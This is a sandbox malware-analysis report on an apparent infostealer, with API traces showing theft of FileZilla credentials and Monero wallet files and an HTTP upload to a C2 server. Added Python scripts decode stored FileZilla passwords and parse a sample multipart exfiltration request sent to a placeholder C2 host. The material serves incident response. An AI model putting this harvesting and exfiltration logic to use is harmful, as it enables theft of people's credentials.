                            • Source File: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91b881e467f4dbbf7f49b85f02629582a0d1464499b94c91115b9c249a729ade
                            • Instruction ID: 0ea4152e23386bca2a606e154f38988a509aca1f68ada22d708996d688169a8d
                            • Opcode Fuzzy Hash: 91b881e467f4dbbf7f49b85f02629582a0d1464499b94c91115b9c249a729ade
                            • Instruction Fuzzy Hash: 7B414CF220C604FFD3042E65EC95A7AB7D5E790320F36892EEAC356A08E2394401AA53
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb6598a31357295bffb313a33d4555a4cd4cc89241a1e9f2e89d09b0f22e9480
                            • Instruction ID: eab180bf08892e8709fd06bf14143259f1cedbd2860eb54cce9379aaf4e3afb7
                            • Opcode Fuzzy Hash: cb6598a31357295bffb313a33d4555a4cd4cc89241a1e9f2e89d09b0f22e9480
                            • Instruction Fuzzy Hash: 283123FB55C31C5FE340BDF9AC98767BAC9E710760F158639AA50C7704FAA59A004285
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 597d33477068c160c0e94618b98f93478540c9488bc81e3bfe427863f5dc00ec
                            • Instruction ID: 1e0762630ff2dacc87624aad443dd9fcd1e8237417371e8d876ccf125d5e0542
                            • Opcode Fuzzy Hash: 597d33477068c160c0e94618b98f93478540c9488bc81e3bfe427863f5dc00ec
                            • Instruction Fuzzy Hash: F53139F3A282149BF308657CDC957B6B6CADB58320F2B093DD685D7780ED79990083C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bafa5544c3af82d3a8ac8f12bef0013df5d894a30b343a771bd3b884e3d0418
                            • Instruction ID: 519f4b6211c43426bc13f263e2b7e2ee398deef80282516238c38fb569cc1c11
                            • Opcode Fuzzy Hash: 7bafa5544c3af82d3a8ac8f12bef0013df5d894a30b343a771bd3b884e3d0418
                            • Instruction Fuzzy Hash: 543108B290C210EFD315BF18D85166AFBE5FF58710F16482DEAD983250E7355850CA8B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d16ac5993d935abe740afc672c82da3bddf0fde97bf337c467715f90cf96f972
                            • Instruction ID: 2b5509369c441ff732bf69721a418d9719c31278a719b6b1dcc25d349adc41a7
                            • Opcode Fuzzy Hash: d16ac5993d935abe740afc672c82da3bddf0fde97bf337c467715f90cf96f972
                            • Instruction Fuzzy Hash: 4FE086B214930CCFD3407851EC8C7BBB79CE755731E948469AB5142644FE742608516A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00360DBA,00360DB7,00360DB6,00360DB3), ref: 00350362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00350369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00350385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 003503CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 003503DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00350419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00350463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00350562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00350571
                            • lstrcat.KERNEL32(?,url: ), ref: 00350580
                            • lstrcat.KERNEL32(?,00000000), ref: 00350593
                            • lstrcat.KERNEL32(?,00361678), ref: 003505A2
                            • lstrcat.KERNEL32(?,00000000), ref: 003505B5
                            • lstrcat.KERNEL32(?,0036167C), ref: 003505C4
                            • lstrcat.KERNEL32(?,login: ), ref: 003505D3
                            • lstrcat.KERNEL32(?,00000000), ref: 003505E6
                            • lstrcat.KERNEL32(?,00361688), ref: 003505F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00350604
                            • lstrcat.KERNEL32(?,00000000), ref: 00350617
                            • lstrcat.KERNEL32(?,00361698), ref: 00350626
                            • lstrcat.KERNEL32(?,0036169C), ref: 00350635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 995d46156f57353530ff645d42cd86d1f2751c67244f6dd0f93b5baa951062f6
                            • Instruction ID: 664056df823ffb48b4b0c01792bbb7c7be16291cea870dfac9cca5e2776ad156
                            • Opcode Fuzzy Hash: 995d46156f57353530ff645d42cd86d1f2751c67244f6dd0f93b5baa951062f6
                            • Instruction Fuzzy Hash: 87D131719002089BDB06EBE0DD96DEE7778FF14301F448519F902BA0A5EF74AA0DEB61
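The call sequence above is the sample's FileZilla credential harvester: it reads `\AppData\Roaming\FileZilla\recentservers.xml`, uses StrStrA to jump between the literal markers `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">`, and then concatenates `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: ` into one record. The Python script below is an added example for responders, not code from the sample or from Joe Sandbox. It parses a constructed recentservers.xml and prints each entry in the record layout the lstrcat chain implies, so the set of FTP/SFTP credentials that must be rotated can be listed from a victim's profile. The separator strings at 00361678, 0036167C, 00361688 and 00361698 are not resolved in the report, so a colon between host and port and a newline after each field are assumptions. FileZilla's sitemanager.xml uses the same element names, so the parser handles it as well, which goes beyond what the trace shows.

```python
"""Parse FileZilla's recentservers.xml the way the traced harvester consumes it.

Added example for incident responders; not code from the analysed sample.
"""
import base64
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample in the layout FileZilla writes; not taken from the analysed host.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_filezilla_servers(xml_text: str) -> List[Dict[str, str]]:
    """Return one record per <Server>: host, port, user and the decoded password.

    The traced function does not parse XML; it StrStrA-scans for the literal
    markers <Host>, <Port>, <User> and <Pass encoding="base64">. A <Server>
    entry with no base64 <Pass> element (anonymous or ask-for-password logons)
    therefore yields an empty password, which is mirrored here.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    records: List[Dict[str, str]] = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User", default="")
        pass_el = server.find("Pass")
        password = ""
        if pass_el is not None and pass_el.get("encoding") == "base64" and pass_el.text:
            password = base64.b64decode(pass_el.text).decode("utf-8", errors="replace")
        records.append({"host": host, "port": port, "user": user, "password": password})
    return records


def format_stealer_record(rec: Dict[str, str]) -> str:
    """Reproduce the line layout implied by the lstrcat sequence in the trace.

    The trace appends "browser: FileZilla", "profile: null", "url: " + host +
    <sep> + port, "login: " + user and "password: " + pass. The separator
    strings are not resolved in the report; ":" and "\n" are assumed.
    """
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password']}\n"
    )


if __name__ == "__main__":
    # Point this at a real %APPDATA%\FileZilla\recentservers.xml or sitemanager.xml
    # during triage; the constructed sample is used here so the script runs offline.
    for rec in parse_filezilla_servers(SAMPLE_RECENTSERVERS):
        print(format_stealer_record(rec))
```

Every host/user pair printed by the script is a credential the stealer would have collected verbatim, because FileZilla's base64 encoding is an encoding, not encryption; rotate those accounts rather than relying on the file's location.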
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003459F8
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 00345A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FBE798,00000000,?,00FAFB60,00000000,?,00361A1C), ref: 00345E71
                            • lstrlen.KERNEL32(00000000), ref: 00345E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00345E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00345E9A
                            • lstrlen.KERNEL32(00000000), ref: 00345EAF
                            • lstrlen.KERNEL32(00000000), ref: 00345ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00345EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00345F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00345F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00345F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00345FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00345FBD
                            • HttpOpenRequestA.WININET(00000000,00FBE808,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00345BF8
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • InternetCloseHandle.WININET(00000000), ref: 00345FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: c08a75fcc30be063f052392fbf1c84ee5875444a92963a02c4f52b19eb09fbf3
                            • Instruction ID: b07b1f13b46d0ae598d61572f70002a52ef668b028f3cd5fb0125ed9451f6651
                            • Opcode Fuzzy Hash: c08a75fcc30be063f052392fbf1c84ee5875444a92963a02c4f52b19eb09fbf3
                            • Instruction Fuzzy Hash: C6122371820518ABDB16EBA0DC95FEE7778BF14701F404259F9067A0A1EF702A4DEF61
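The WinINet sequence above is the sample's HTTP path to its C2: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT, so no proxy discovery), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), HttpSendRequestA, and InternetReadFile draining the response in 0xC7-byte reads. The `------` strings in the function are consistent with a multipart/form-data boundary. The Python below is an added example for reconstructing such an upload from a packet capture or proxy log, not code from the sample: it takes the boundary from the Content-Type header and splits the body into named form fields and attached files. The request is constructed; the boundary token, the field names `hwid` and `file` and the path `/upload` are assumptions, not values recovered from the sample.

```python
"""Extract the form fields from a multipart/form-data POST such as the one the
traced WinINet path sends. Added example for IR reconstruction; not sample code."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed request, not a capture of the analysed sample. The boundary style
# (dashes followed by a token) is an assumption based only on the "------"
# strings in the trace; the field names and path are likewise assumptions.
SAMPLE_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: c2.example.test\r\n"
    b"Content-Type: multipart/form-data; boundary=------ABCDEF123456\r\n"
    b"\r\n"
    b"--------ABCDEF123456\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"0123456789ABCDEF\r\n"
    b"--------ABCDEF123456\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"browser: FileZilla\r\nprofile: null\r\nurl: ftp.example.test:21\r\n"
    b"login: deploy\r\npassword: hunter2\r\n"
    b"\r\n"
    b"--------ABCDEF123456--\r\n"
)

# (field name, filename or None, raw part content)
Part = Tuple[str, Optional[str], bytes]


def split_request(raw: bytes) -> Tuple[bytes, bytes]:
    """Split a raw HTTP request into its header block and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator in request")
    return head, body


def boundary_from_headers(head: bytes) -> bytes:
    """Read the boundary parameter from the Content-Type header (RFC 2046)."""
    m = re.search(
        rb"(?im)^content-type:\s*multipart/form-data;.*?boundary=\"?([^\";\r\n]+)", head
    )
    if not m:
        raise ValueError("request is not multipart/form-data")
    return m.group(1)


def parse_multipart(body: bytes, boundary: bytes) -> List[Part]:
    """Split a multipart body into parts. Each part is delimited by CRLF "--" boundary;
    the closing delimiter carries a trailing "--"."""
    delimiter = b"--" + boundary
    parts: List[Part] = []
    for chunk in body.split(delimiter)[1:]:
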